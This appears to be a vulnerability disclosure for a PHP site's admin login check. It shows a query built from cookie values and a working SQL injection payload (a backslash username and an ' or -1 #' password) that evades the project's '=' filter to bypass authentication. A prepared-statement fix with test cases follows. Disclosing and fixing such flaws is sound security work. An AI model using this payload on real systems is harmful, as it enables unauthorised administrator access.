
backstage_access_control


The vulnerability exists in \Include\contorl.php, line 128.

The function checkuser determines whether the user is logged in.

At line 187:

$query=$db_conn->query("select * from sc_user where user_admin='$cookieuseradmin' and user_ps='$cookieuserpass'");

The variables $cookieuseradmin and $cookieuserpass are obtained from cookies

and pass through two detection functions, test_input() and verify_str().

So the universal password "or 1 = 1" is not feasible, because the equality sign is filtered in the verify_str function. However, the password "or-1" is accepted, so the final payload is:

Payload:
select * from sc_user where user_admin='\' and user_ps=' or -1 #'
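
The same login check with the two cookie values bound as parameters instead of concatenated into the SQL string. This is an added example, not the project's own code. The function name `checkuser_bound`, the use of PDO with an in-memory SQLite database (chosen so it runs without a database server) and the table contents are assumptions made for illustration.

```php
<?php
// Added example, not the project's code. Assumes PDO with the SQLite driver;
// the table row and the cookie values below are constructed sample data.

// Hypothetical replacement for the query at line 187: the cookie values are
// bound as parameters, so the SQL text is fixed before any input is seen.
function checkuser_bound(PDO $db, string $admin, string $pass): bool
{
    $stmt = $db->prepare(
        'select count(*) from sc_user where user_admin = :admin and user_ps = :pass'
    );
    $stmt->execute([':admin' => $admin, ':pass' => $pass]);
    return (int) $stmt->fetchColumn() === 1;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('create table sc_user (user_admin text, user_ps text)');
// Constructed account; user_ps holds a placeholder value.
$db->exec("insert into sc_user values ('admin', 'stored-secret')");

// Constructed cookie pairs: a valid login, a wrong password, and the two
// values from the payload above (a lone backslash and " or -1 #").
$cases = [
    'valid login'    => ['admin', 'stored-secret'],
    'wrong password' => ['admin', 'guess'],
    'page payload'   => ['\\', ' or -1 #'],
];

foreach ($cases as $label => [$admin, $pass]) {
    $result = checkuser_bound($db, $admin, $pass) ? 'accepted' : 'rejected';
    printf("%-15s %s\n", $label, $result);
}
```

With bound parameters the backslash and the quote-free password are compared as literal column values, so the check no longer depends on what test_input() and verify_str() happen to filter.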
